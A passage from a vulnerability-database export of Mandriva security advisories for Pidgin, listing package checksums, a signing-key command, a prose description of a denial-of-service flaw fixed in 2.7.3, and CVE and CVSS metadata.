2008.0/i586/pidgin-mono-2.6.6-0.1mdv2008.0.i586.rpm\r\n 6da48c44f958ffb67455d8f509666c10 2008.0/i586/pidgin-perl-2.6.6-0.1mdv2008.0.i586.rpm\r\n e91b445d44e9f91a2ec01a810a4c38a8 2008.0/i586/pidgin-plugins-2.6.6-0.1mdv2008.0.i586.rpm\r\n c8e71cea5a86ebcb8c7ed9d6dac24b6e 2008.0/i586/pidgin-silc-2.6.6-0.1mdv2008.0.i586.rpm\r\n e7c31cba54af11f0edb6751bd7588020 2008.0/i586/pidgin-tcl-2.6.6-0.1mdv2008.0.i586.rpm \r\n 70ad21797df8b08cbfb58fc68eb4a8cf 2008.0/SRPMS/pidgin-2.6.6-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n c9e7f9564baccc6bc287efca970e38d5 2008.0/x86_64/finch-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 4fd49c393a4088afa297fe4a81ca65b3 2008.0/x86_64/lib64finch0-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 2b40ea32871b376e4dd73f49ec2a36d7 2008.0/x86_64/lib64purple0-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 05503a1c0b1bbd012f3189787e09f3e5 2008.0/x86_64/lib64purple-devel-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n e3d4bc963da791a4a5dc8045d31f0c54 2008.0/x86_64/pidgin-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n bcae488fe843bb895bba2ad5b18e86bc 2008.0/x86_64/pidgin-bonjour-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n e168b0d56e10dfe2c876702faa408f7e 2008.0/x86_64/pidgin-client-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 0715caa8f7089f61d33d92713b269324 2008.0/x86_64/pidgin-gevolution-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 5e951d56643525136acf0da0e5f7f21e 2008.0/x86_64/pidgin-i18n-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 11d8b84a808c378a20643b4804df07f9 2008.0/x86_64/pidgin-meanwhile-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 8363da50ff8fc2e1308f6cb4a0232a57 2008.0/x86_64/pidgin-mono-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n a9deb37c4c307cf813bd4e9b623ec887 2008.0/x86_64/pidgin-perl-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 212ed915b101ddcbbfbb6d16b3b2e16c 2008.0/x86_64/pidgin-plugins-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 3d844afe270123a03624936762f6d933 2008.0/x86_64/pidgin-silc-2.6.6-0.1mdv2008.0.x86_64.rpm\r\n 7c311ac8a7ceec13d4933a4840c2c3a9 2008.0/x86_64/pidgin-tcl-2.6.6-0.1mdv2008.0.x86_64.rpm \r\n 70ad21797df8b08cbfb58fc68eb4a8cf 2008.0/SRPMS/pidgin-2.6.6-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n cb7a40ecc6ae8dd5a35d16f892be6837 2009.1/i586/finch-2.6.6-0.1mdv2009.1.i586.rpm\r\n 82db17cb68dddce64cffb125da531871 2009.1/i586/libfinch0-2.6.6-0.1mdv2009.1.i586.rpm\r\n 5ed7e9c7503ec5a860bcb4a08a1dfc52 2009.1/i586/libpurple0-2.6.6-0.1mdv2009.1.i586.rpm\r\n 3c7e67bede967dc9a75e67f5ba0d4682 2009.1/i586/libpurple-devel-2.6.6-0.1mdv2009.1.i586.rpm\r\n 1c9490f205ef22d235c62ec8919eb9f5 2009.1/i586/pidgin-2.6.6-0.1mdv2009.1.i586.rpm\r\n 02a7a3b4f7c329a27445c27661ca1589 2009.1/i586/pidgin-bonjour-2.6.6-0.1mdv2009.1.i586.rpm\r\n 432ea2a9fb79a07e7490f6ab832613e7 2009.1/i586/pidgin-client-2.6.6-0.1mdv2009.1.i586.rpm\r\n e31b2a2b667dacbdc918e8b5dbcff996 2009.1/i586/pidgin-gevolution-2.6.6-0.1mdv2009.1.i586.rpm\r\n 4b0c2b039dd58992507ca2f0bb801b22 2009.1/i586/pidgin-i18n-2.6.6-0.1mdv2009.1.i586.rpm\r\n 9e39513f6310f39999bb4645545fc5c7 2009.1/i586/pidgin-meanwhile-2.6.6-0.1mdv2009.1.i586.rpm\r\n 0e7787c636f4f30cba7ad4d863fb720c 2009.1/i586/pidgin-mono-2.6.6-0.1mdv2009.1.i586.rpm\r\n 2df8fbea4fa43b7cfbda29241614907f 2009.1/i586/pidgin-perl-2.6.6-0.1mdv2009.1.i586.rpm\r\n ab2a3d17c627da8e0f445de8f6a1f371 2009.1/i586/pidgin-plugins-2.6.6-0.1mdv2009.1.i586.rpm\r\n fed0dc5e71e51bda6e1c6e5dc4296883 2009.1/i586/pidgin-silc-2.6.6-0.1mdv2009.1.i586.rpm\r\n 010fe45d263e609656af0c3b5235d9a1 2009.1/i586/pidgin-tcl-2.6.6-0.1mdv2009.1.i586.rpm \r\n 1a90d8b3989e31ab9d1769b454de8a42 2009.1/SRPMS/pidgin-2.6.6-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 21abb5508ce03d26b88b942af4e14a4f 2009.1/x86_64/finch-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n c308a1b01304d63cd58dbabcab49119b 2009.1/x86_64/lib64finch0-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n cf0c32085702b936a1f69e1caa6e2dcc 2009.1/x86_64/lib64purple0-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 232104e2b9bb0c66aa774f365a45b2ad 2009.1/x86_64/lib64purple-devel-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 8043caea0b17e2de041c4ae0465d90ea 2009.1/x86_64/pidgin-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 0f6c55a69562a532b1100670571c3b26 2009.1/x86_64/pidgin-bonjour-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n c09462c1ef04b6ddc0223a02ccdb166f 2009.1/x86_64/pidgin-client-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 6ac732d589d33f7181ea8dadbfd9942e 2009.1/x86_64/pidgin-gevolution-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 0fa53c5e0337129d90d774726dee4125 2009.1/x86_64/pidgin-i18n-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 93457954dbd33a99f42bad1a0a98c109 2009.1/x86_64/pidgin-meanwhile-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 05fecf234348f4d4397fc2e48f1be04e 2009.1/x86_64/pidgin-mono-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 033f93c6dc9298e5f3dc0fa89c587b9b 2009.1/x86_64/pidgin-perl-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 664e601cd561b106c0a158a648492528 2009.1/x86_64/pidgin-plugins-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 95ed0f1bfd9baba0e23cb0c50d3757b7 2009.1/x86_64/pidgin-silc-2.6.6-0.1mdv2009.1.x86_64.rpm\r\n 52828745a279468c82975af28a385151 2009.1/x86_64/pidgin-tcl-2.6.6-0.1mdv2009.1.x86_64.rpm \r\n 1a90d8b3989e31ab9d1769b454de8a42 2009.1/SRPMS/pidgin-2.6.6-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n 1c29f9d4c4f6f4cfbc0944bceeb6668b 2010.0/i586/finch-2.6.6-0.1mdv2010.0.i586.rpm\r\n 29bfd28b9aea472156e5a9de553bc1b7 2010.0/i586/libfinch0-2.6.6-0.1mdv2010.0.i586.rpm\r\n 496a494ab167a8bfb6dee5928e5b34e1 2010.0/i586/libpurple0-2.6.6-0.1mdv2010.0.i586.rpm\r\n 6b0f5a9b3baa507fceab913a4f048047 2010.0/i586/libpurple-devel-2.6.6-0.1mdv2010.0.i586.rpm\r\n 385680fa424f34569f8c0c6f3dee4f4a 2010.0/i586/pidgin-2.6.6-0.1mdv2010.0.i586.rpm\r\n c07570c72eb5679964a16e40328f78cc 2010.0/i586/pidgin-bonjour-2.6.6-0.1mdv2010.0.i586.rpm\r\n bed045f942b8581a8f218070eab86dd0 2010.0/i586/pidgin-client-2.6.6-0.1mdv2010.0.i586.rpm\r\n 50c4dacdb01d054ab5e0b80309704cb7 2010.0/i586/pidgin-gevolution-2.6.6-0.1mdv2010.0.i586.rpm\r\n ab3939b75120e531e60e312a385533ff 2010.0/i586/pidgin-i18n-2.6.6-0.1mdv2010.0.i586.rpm\r\n 149b333453e1126a3b4641e19906c88f 2010.0/i586/pidgin-meanwhile-2.6.6-0.1mdv2010.0.i586.rpm\r\n 29d5d75e9d84ada8fb82ce176f782226 2010.0/i586/pidgin-mono-2.6.6-0.1mdv2010.0.i586.rpm\r\n 01443fc929ffd95481bae32ad4399819 2010.0/i586/pidgin-perl-2.6.6-0.1mdv2010.0.i586.rpm\r\n 84781f1d515702edad903793a867fd23 2010.0/i586/pidgin-plugins-2.6.6-0.1mdv2010.0.i586.rpm\r\n 3c1828e4cde8c0c36cdc6b242642d3a8 2010.0/i586/pidgin-silc-2.6.6-0.1mdv2010.0.i586.rpm\r\n cfb8a979ecb4af00249c9ea1586ba43b 2010.0/i586/pidgin-tcl-2.6.6-0.1mdv2010.0.i586.rpm \r\n 179fe3c8d4d38eadee60cbfb51aeb19c 2010.0/SRPMS/pidgin-2.6.6-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 6eaad34c716bbdd7fa01c5feed445f76 2010.0/x86_64/finch-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n ab025b0de4c4a7d8047309c2d94ce0c0 2010.0/x86_64/lib64finch0-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n ff08767b311b4cd0fae4b756a86c4787 2010.0/x86_64/lib64purple0-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n ca65fc197deb32c6e8b05c67c457c66b 2010.0/x86_64/lib64purple-devel-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n 32dd77d13f9d18480a44d9e711e6fe53 2010.0/x86_64/pidgin-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n 169a880508c91e1a4444c546776fcd00 2010.0/x86_64/pidgin-bonjour-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n 6bcdf650c31b3092992e943e7b2aa070 2010.0/x86_64/pidgin-client-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n 2afdef1f1fc09373856b65d7f71e8621 2010.0/x86_64/pidgin-gevolution-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n 6a4a9fb474d69168216e72331ad6ad9c 2010.0/x86_64/pidgin-i18n-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n 7edfcfbe7a2ce9a6b01232558f641ec7 2010.0/x86_64/pidgin-meanwhile-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n ec35aac66e974579e06fbb6057a6df31 2010.0/x86_64/pidgin-mono-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n 20e61a99135d61b0deb910648b78923e 2010.0/x86_64/pidgin-perl-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n ae9cdc960d4edc6c8bc1854250203036 2010.0/x86_64/pidgin-plugins-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n b80ea4263b63cfc34dd4009ee362090b 2010.0/x86_64/pidgin-silc-2.6.6-0.1mdv2010.0.x86_64.rpm\r\n 3d3ade5b5518b513edc78d1b12a4073c 2010.0/x86_64/pidgin-tcl-2.6.6-0.1mdv2010.0.x86_64.rpm \r\n 179fe3c8d4d38eadee60cbfb51aeb19c 2010.0/SRPMS/pidgin-2.6.6-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 149dcd26bf531e6ee3e75b3eccc0b9ba mes5/i586/finch-2.6.6-0.1mdvmes5.i586.rpm\r\n 1a10b71c66ed39bdd40846721fb0a87b mes5/i586/libfinch0-2.6.6-0.1mdvmes5.i586.rpm\r\n 6929c7486d4d242eb4c1bb3c11d2a945 mes5/i586/libpurple0-2.6.6-0.1mdvmes5.i586.rpm\r\n 1d2539414922b39bc00b62755ddaa816 mes5/i586/libpurple-devel-2.6.6-0.1mdvmes5.i586.rpm\r\n 732cba3fd4e87cd9b8b619c5c69ab992 mes5/i586/pidgin-2.6.6-0.1mdvmes5.i586.rpm\r\n 9fd465a4f8fac859c99866105f7b8ca6 mes5/i586/pidgin-bonjour-2.6.6-0.1mdvmes5.i586.rpm\r\n cc9df9d83f6d502be50ab878fb59548a mes5/i586/pidgin-client-2.6.6-0.1mdvmes5.i586.rpm\r\n 83e99b56360e08fd571073c73c1e90b1 mes5/i586/pidgin-gevolution-2.6.6-0.1mdvmes5.i586.rpm\r\n c19131aa4670612f77df7fefa0075832 mes5/i586/pidgin-i18n-2.6.6-0.1mdvmes5.i586.rpm\r\n b1102c9ae4445baf526c6c146300f5c2 mes5/i586/pidgin-meanwhile-2.6.6-0.1mdvmes5.i586.rpm\r\n 97a7683edc25e5d4e1291086e882db52 mes5/i586/pidgin-mono-2.6.6-0.1mdvmes5.i586.rpm\r\n b456b539f96ddf35cb06ce8d0ffc1c13 mes5/i586/pidgin-perl-2.6.6-0.1mdvmes5.i586.rpm\r\n 494d4e499b6b3edd278d24051d844eaf mes5/i586/pidgin-plugins-2.6.6-0.1mdvmes5.i586.rpm\r\n a3bde2acd56c097262e2e82b6dad619d mes5/i586/pidgin-silc-2.6.6-0.1mdvmes5.i586.rpm\r\n 250a49eb240275dbda69c9c4b6914590 mes5/i586/pidgin-tcl-2.6.6-0.1mdvmes5.i586.rpm \r\n 267308510863ca64bb333f71467e7bd9 mes5/SRPMS/pidgin-2.6.6-0.1mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 8d64ee79b213c13c19a4198841a144ac mes5/x86_64/finch-2.6.6-0.1mdvmes5.x86_64.rpm\r\n 5c433ebf35e04e8d6de964137dc276dd mes5/x86_64/lib64finch0-2.6.6-0.1mdvmes5.x86_64.rpm\r\n 7cc32a1bb4ebe61b0723f94658a45ae1 mes5/x86_64/lib64purple0-2.6.6-0.1mdvmes5.x86_64.rpm\r\n 2d427370e582eb2709b1b3f50b54a364 mes5/x86_64/lib64purple-devel-2.6.6-0.1mdvmes5.x86_64.rpm\r\n db09b8debee6cca9ebbd66fa2d12ec47 mes5/x86_64/pidgin-2.6.6-0.1mdvmes5.x86_64.rpm\r\n bcc51f21decc8447069faa3c1f8563c2 mes5/x86_64/pidgin-bonjour-2.6.6-0.1mdvmes5.x86_64.rpm\r\n 5e368dec9bccac6530c79855892c8a45 mes5/x86_64/pidgin-client-2.6.6-0.1mdvmes5.x86_64.rpm\r\n d068b236e3e33274d32ccf911d07ae27 mes5/x86_64/pidgin-gevolution-2.6.6-0.1mdvmes5.x86_64.rpm\r\n 14542696ab4124d542435f2d09f1b8e2 mes5/x86_64/pidgin-i18n-2.6.6-0.1mdvmes5.x86_64.rpm\r\n 1abe031c7d81ef8e3744ccac89e085f8 mes5/x86_64/pidgin-meanwhile-2.6.6-0.1mdvmes5.x86_64.rpm\r\n fe6d09ae59b3afb8d6154411d2274ad8 mes5/x86_64/pidgin-mono-2.6.6-0.1mdvmes5.x86_64.rpm\r\n 0cafc627ab6efa449cd1857c9032de68 mes5/x86_64/pidgin-perl-2.6.6-0.1mdvmes5.x86_64.rpm\r\n 650f4c48dafe08cca128ff1410c7c919 mes5/x86_64/pidgin-plugins-2.6.6-0.1mdvmes5.x86_64.rpm\r\n fd78039daafeb41f2356a3e617f37c08 mes5/x86_64/pidgin-silc-2.6.6-0.1mdvmes5.x86_64.rpm\r\n afb6b2d287d4df27e845fbbb0331052d mes5/x86_64/pidgin-tcl-2.6.6-0.1mdvmes5.x86_64.rpm \r\n 267308510863ca64bb333f71467e7bd9 mes5/SRPMS/pidgin-2.6.6-0.1mdvmes5.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFLfSUHmqjQ0CJFipgRAttGAKCxQbsdGtNK2rs9RMbLQmhz2UM69wCg32zV\r\nvL0qCU2xlQDncxOIar1eKrI=\r\n=vJpo\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2010-02-19T00:00:00", "title": "[ MDVSA-2010:041 ] pidgin", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-19T00:00:00", "id": "SECURITYVULNS:DOC:23258", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23258", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:36", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2010:148\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : pidgin\r\n Date : August 12, 2010\r\n Affected: 2008.0, 2009.0, 2010.0, 2010.1\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A security vulnerability has been identified and fixed in pidgin:\r\n \r\n The clientautoresp function in family_icbm.c in the oscar protocol\r\n plugin in libpurple in Pidgin before 2.7.2 allows remote authenticated\r\n users to cause a denial of service &#40;NULL pointer dereference and\r\n application crash&#41; via an X-Status message that lacks the expected\r\n end tag for a &#40;1&#41; desc or &#40;2&#41; title element &#40;CVE-2010-2528&#41;.\r\n \r\n Packages for 2008.0 and 2009.0 are provided due to the Extended\r\n Maintenance Program for those products.\r\n \r\n This update provides pidgin 2.7.3, which is not vulnerable to this\r\n issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2528\r\n http://pidgin.im/news/security/\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n e4fd99a595641b265da0fd1dc6d1ffcf 2008.0/i586/finch-2.7.3-0.1mdv2008.0.i586.rpm\r\n 35d3eec60d6aee7cc349716c8e7bac52 2008.0/i586/libfinch0-2.7.3-0.1mdv2008.0.i586.rpm\r\n 562cfc92fb2c554bafaf09a8ef2944fb 2008.0/i586/libpurple0-2.7.3-0.1mdv2008.0.i586.rpm\r\n a8a8569334d7974e5fbe194f36d358a4 2008.0/i586/libpurple-devel-2.7.3-0.1mdv2008.0.i586.rpm\r\n b02ab7ea47017ff8cbf084ee4405ea22 2008.0/i586/pidgin-2.7.3-0.1mdv2008.0.i586.rpm\r\n 072207a6fd1e05838ae680e9203269d1 2008.0/i586/pidgin-bonjour-2.7.3-0.1mdv2008.0.i586.rpm\r\n e6d3f52740bed9569021e1b153a6b53f 2008.0/i586/pidgin-client-2.7.3-0.1mdv2008.0.i586.rpm\r\n a9f3bef0bfe4b85d41e313ebb225295a 2008.0/i586/pidgin-gevolution-2.7.3-0.1mdv2008.0.i586.rpm\r\n fa1743cfca50eea23b441ca4e8a5f50b 2008.0/i586/pidgin-i18n-2.7.3-0.1mdv2008.0.i586.rpm\r\n e0d5bd6ab76c0b17951b82f88e7e956c 2008.0/i586/pidgin-meanwhile-2.7.3-0.1mdv2008.0.i586.rpm\r\n f92bc4ee72d729f26f9ab7e2f385470f 2008.0/i586/pidgin-perl-2.7.3-0.1mdv2008.0.i586.rpm\r\n 32addf782d1a19b1fd40bfe73e51d357 2008.0/i586/pidgin-plugins-2.7.3-0.1mdv2008.0.i586.rpm\r\n 3d4a5d5b7e705dfdf5fe41ea39b75565 2008.0/i586/pidgin-silc-2.7.3-0.1mdv2008.0.i586.rpm\r\n 79b6080156d8e4688aa297e96d551c7a 2008.0/i586/pidgin-tcl-2.7.3-0.1mdv2008.0.i586.rpm \r\n ef57d4556f401871ea93163d0f6ff51a 2008.0/SRPMS/pidgin-2.7.3-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n 2d04ae11eca52b5220f2fa6fbba33717 2008.0/x86_64/finch-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n 1250c66561ceaba90237aed7e2a98356 2008.0/x86_64/lib64finch0-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n d2256ba7ef4f44a4c0627d2ce1b6b162 2008.0/x86_64/lib64purple0-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n 5e1d536a439a01a8dcc1ed5197ebd280 2008.0/x86_64/lib64purple-devel-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n ec9efec4fa7319a3e5d42a4d43ca7781 2008.0/x86_64/pidgin-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n c7f7c07bcf9ecaf6358a7740c4b22cbd 2008.0/x86_64/pidgin-bonjour-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n 4ee28141dbb69a8be25c40fc7930269c 2008.0/x86_64/pidgin-client-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n 6d8ebdb3204364475461e0ae1c01d2bf 2008.0/x86_64/pidgin-gevolution-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n d0c676e49c53364da58807fa2cad0a04 2008.0/x86_64/pidgin-i18n-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n 2dd48faece804b4d8dd46f8059cc877e 2008.0/x86_64/pidgin-meanwhile-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n f68b63989cfc13e9670cb75b9479b2f8 2008.0/x86_64/pidgin-perl-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n ad286ee88a4acea3d1b0f4425d3582f5 2008.0/x86_64/pidgin-plugins-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n d09967081926011d47e31dad0a6c2f89 2008.0/x86_64/pidgin-silc-2.7.3-0.1mdv2008.0.x86_64.rpm\r\n 1eb27150d5f14d5f46299e4c56a56904 2008.0/x86_64/pidgin-tcl-2.7.3-0.1mdv2008.0.x86_64.rpm \r\n ef57d4556f401871ea93163d0f6ff51a 2008.0/SRPMS/pidgin-2.7.3-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n 076963b985c194b076f9d86f05aaac0b 2009.0/i586/finch-2.7.3-0.1mdv2009.0.i586.rpm\r\n f6b17accc5a30052f0ca5b2ea2aad709 2009.0/i586/libfinch0-2.7.3-0.1mdv2009.0.i586.rpm\r\n 40f0de67c47f31565b67b75f5bef3898 2009.0/i586/libpurple0-2.7.3-0.1mdv2009.0.i586.rpm\r\n 6b8eda06a712c0c37984bcaae5e6fb6a 2009.0/i586/libpurple-devel-2.7.3-0.1mdv2009.0.i586.rpm\r\n 0ab13eac41ff8ef93701c8d7cad6f901 2009.0/i586/pidgin-2.7.3-0.1mdv2009.0.i586.rpm\r\n 072166d9e8ea9e474d47fc39ddb1991b 2009.0/i586/pidgin-bonjour-2.7.3-0.1mdv2009.0.i586.rpm\r\n 1129d2755380e21e66aff39b466ff517 2009.0/i586/pidgin-client-2.7.3-0.1mdv2009.0.i586.rpm\r\n 80a6c489a6dca369399077393e70febf 2009.0/i586/pidgin-gevolution-2.7.3-0.1mdv2009.0.i586.rpm\r\n 438f4448c4290b76b0e0b7dc7db64ded 2009.0/i586/pidgin-i18n-2.7.3-0.1mdv2009.0.i586.rpm\r\n fc9c63394102d193848a5b72dbb233a6 2009.0/i586/pidgin-meanwhile-2.7.3-0.1mdv2009.0.i586.rpm\r\n cbe8886303178eaa539cacbe4c00d3a4 2009.0/i586/pidgin-perl-2.7.3-0.1mdv2009.0.i586.rpm\r\n cc8264e62c50f01d9e1abe02a241bf5c 2009.0/i586/pidgin-plugins-2.7.3-0.1mdv2009.0.i586.rpm\r\n c5a98ff8dd78ffe3e0862f076be82670 2009.0/i586/pidgin-silc-2.7.3-0.1mdv2009.0.i586.rpm\r\n 2b737da515c5b4690fe669e7714e7666 2009.0/i586/pidgin-tcl-2.7.3-0.1mdv2009.0.i586.rpm \r\n 912b7ded0fe3a1d3379dcc35b1c71a19 2009.0/SRPMS/pidgin-2.7.3-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 6fd5c7fffca5a8c448630f03576bf71f 2009.0/x86_64/finch-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n aac333dfc0acea060e03729538ac3aa3 2009.0/x86_64/lib64finch0-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n e732962dcf319f252cdcc50be8d4e641 2009.0/x86_64/lib64purple0-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n d76c51a9439d5c3db513ade1ebf7ef96 2009.0/x86_64/lib64purple-devel-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 8e0c47428aea00708afdb0629b33b181 2009.0/x86_64/pidgin-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 1f0324d68b1dff46ac295eb10c05e850 2009.0/x86_64/pidgin-bonjour-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 2e326154cf2284f49d227a4cec970cc2 2009.0/x86_64/pidgin-client-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 2e36dc2d96f024df021e7acbbec0e70e 2009.0/x86_64/pidgin-gevolution-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 7419ec6a5bd4181042478ce21fdddfce 2009.0/x86_64/pidgin-i18n-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 7ceaa4c90816f0307b4831c38e0e679f 2009.0/x86_64/pidgin-meanwhile-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 266280938d9597dea48f53e8acc37348 2009.0/x86_64/pidgin-perl-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 2154dd887732ff4b06f33d961baf4507 2009.0/x86_64/pidgin-plugins-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n 0a774bbb60f2e6303999f846f8ffaee2 2009.0/x86_64/pidgin-silc-2.7.3-0.1mdv2009.0.x86_64.rpm\r\n d10318a6d1a7a7fe5193c974eeec1959 2009.0/x86_64/pidgin-tcl-2.7.3-0.1mdv2009.0.x86_64.rpm \r\n 912b7ded0fe3a1d3379dcc35b1c71a19 2009.0/SRPMS/pidgin-2.7.3-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n 8fda37f89816a43c013723c6af25e191 2010.0/i586/finch-2.7.3-0.1mdv2010.0.i586.rpm\r\n acc1b447c04b2d0bc3bc294b6ad05ed1 2010.0/i586/libfinch0-2.7.3-0.1mdv2010.0.i586.rpm\r\n 3714427fac881efce00130311225090e 2010.0/i586/libpurple0-2.7.3-0.1mdv2010.0.i586.rpm\r\n ede8ed501bc9a8d9fc2125c02c714ab5 2010.0/i586/libpurple-devel-2.7.3-0.1mdv2010.0.i586.rpm\r\n cca38e55bc6bcd6ed77e12aa9440dc2f 2010.0/i586/pidgin-2.7.3-0.1mdv2010.0.i586.rpm\r\n 442b92aadcd7218a4166b16e56079d11 2010.0/i586/pidgin-bonjour-2.7.3-0.1mdv2010.0.i586.rpm\r\n b6d3272ae774a5d961108819c0229c66 2010.0/i586/pidgin-client-2.7.3-0.1mdv2010.0.i586.rpm\r\n 0ea8d73839491023323448aa5b0e1991 2010.0/i586/pidgin-i18n-2.7.3-0.1mdv2010.0.i586.rpm\r\n 2e22a31b0a218199641e7a30be2e8ccf 2010.0/i586/pidgin-meanwhile-2.7.3-0.1mdv2010.0.i586.rpm\r\n b5282c4d9735b3ee81011c93527c539b 2010.0/i586/pidgin-perl-2.7.3-0.1mdv2010.0.i586.rpm\r\n c4e7719491ce0456df312cdb9f52cd5b 2010.0/i586/pidgin-plugins-2.7.3-0.1mdv2010.0.i586.rpm\r\n f71fd2e28c33d8213d8c7380137255de 2010.0/i586/pidgin-silc-2.7.3-0.1mdv2010.0.i586.rpm\r\n 0cbf0fdba22b49ac756cf59a5e49f1ec 2010.0/i586/pidgin-tcl-2.7.3-0.1mdv2010.0.i586.rpm \r\n 68155307c48ba4c4d83f8337f299d5b0 2010.0/SRPMS/pidgin-2.7.3-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 6987ee958cdfa7012b2e90beb2266d4f 2010.0/x86_64/finch-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 068a1712e8ddabb43193342727011a3a 2010.0/x86_64/lib64finch0-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 5696ffec1f7ebecc1d09794aad3f2f69 2010.0/x86_64/lib64purple0-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 369f365b0beab8b4d12dc818c087f069 2010.0/x86_64/lib64purple-devel-2.7.3-0.1mdv2010.0.x86_64.rpm\r\n 